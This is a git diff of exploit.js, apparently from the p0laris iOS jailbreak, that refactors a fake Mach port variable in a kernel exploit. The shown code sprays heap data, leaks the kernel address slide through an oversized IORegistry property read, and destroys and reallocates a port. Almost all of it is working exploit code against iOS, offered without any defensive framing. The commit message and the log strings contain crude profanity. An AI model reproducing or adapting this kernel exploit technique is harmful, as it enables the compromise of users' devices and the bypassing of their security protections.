cock

1 files changed, 4 insertions, 5 deletions

diff --git a/src/stage4/kexp/exploit.js b/src/stage4/kexp/exploit.js
index 8945710..85a4eb9 100755
--- a/src/stage4/kexp/exploit.js
+++ b/src/stage4/kexp/exploit.js
@@ -44,7 +44,7 @@ function find_ipcspacekernel() {
 var task_self = 0;
 var kslide = 0;
 
-var fakeportData = 0;
+var fakeportData = new mach_port_t();
 
 var kOSSerializeDictionary      = 0x01000000;
 var kOSSerializeArray           = 0x02000000;
@@ -113,7 +113,6 @@ function copyinPort(kport, cnt) {
 	var o = MACH_PORT_NULL;
 	var data = shit_heap(4);
 	var master = new io_master_t();
-	fakeportData = shit_heap(4);
 	var host_self = mach_host_self();
 	host_get_io_master(mach_host_self(), master.addy);
 	ret = spray_data(NULL, 0, 5, data);
@@ -153,7 +152,7 @@ function copyinPort(kport, cnt) {
 		ret = IORegistryEntryGetProperty(o, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", buf, size);
 		p0laris_log("%d %s\n", ret, mach_error_string(ret));
 		if (ret == KERN_SUCCESS) {
-			spray_data(tst, strlen(tst) + 1, 10, fakeportData);
+			spray_data(tst, strlen(tst) + 1, 10, fakeportData.addy);
 			kslide = (((read_u32(buf + (9 << 2)) & 0xFFF00000) + 0x1000) -0x80001000) >>> 0;
 			p0laris_log("YOLO YOLO YOLO kaslr_slide=%s\n", kslide.toString(16));
 			found = true;
@@ -488,8 +487,8 @@ again: while (true) {
 	p0laris_log("fuck\n");
 	usleep(10000);
 	sched_yield();
-	mach_port_destroy(mach_task_self(), read_u32(fakeportData));
-	ret__ = spray_data(tst, tst_str.length + 1, 10, fakeportData);
+	mach_port_destroy(mach_task_self(), fakeportData.deref());
+	ret__ = spray_data(tst, tst_str.length + 1, 10, fakeportData.addy);
 	p0laris_log("sd %d (%s)\n", ret__, mach_error_string(ret__));
 	p0laris_log("fuck\n");
 	p0laris_log("done realloc");